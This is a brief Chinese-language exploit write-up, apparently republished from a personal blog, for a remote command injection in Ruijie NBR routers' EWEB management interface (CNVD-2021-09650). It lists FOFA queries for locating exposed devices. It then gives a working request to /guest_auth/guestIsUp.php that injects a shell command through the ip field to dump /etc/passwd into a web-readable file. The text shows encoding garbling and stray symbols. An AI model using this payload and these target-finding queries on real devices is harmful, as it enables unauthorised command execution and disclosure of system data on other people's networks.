漏洞描述
i ?
銳捷NBR路由器 EWEB網(wǎng)管系統(tǒng)部分接口存在命令注入,導(dǎo)致遠程命令執(zhí)行獲取權(quán)限
漏洞影響
s ?
銳捷NBR路由器 EWEB網(wǎng)管系統(tǒng)
空間測繪
d ?
FOFA:title="銳捷網(wǎng)絡(luò)-EWEB網(wǎng)管系統(tǒng)"
?
FOFA:icon_hash="-692947551"
漏洞復(fù)現(xiàn)
- ?訪問首頁
- ?執(zhí)行Payload命令
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
文章來源:http://www.zghlxwxcb.cn/news/detail-613420.html
- 然后訪問頁面 /guest_auth/test.txt 就可以看到命令執(zhí)行的結(jié)果
文章來源地址http://www.zghlxwxcb.cn/news/detail-613420.html
個人博客
孤桜懶契:https://gylq.gitee.io/time
到了這里,關(guān)于銳捷 NBR路由器 遠程命令執(zhí)行漏洞(CNVD-2021-09650)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!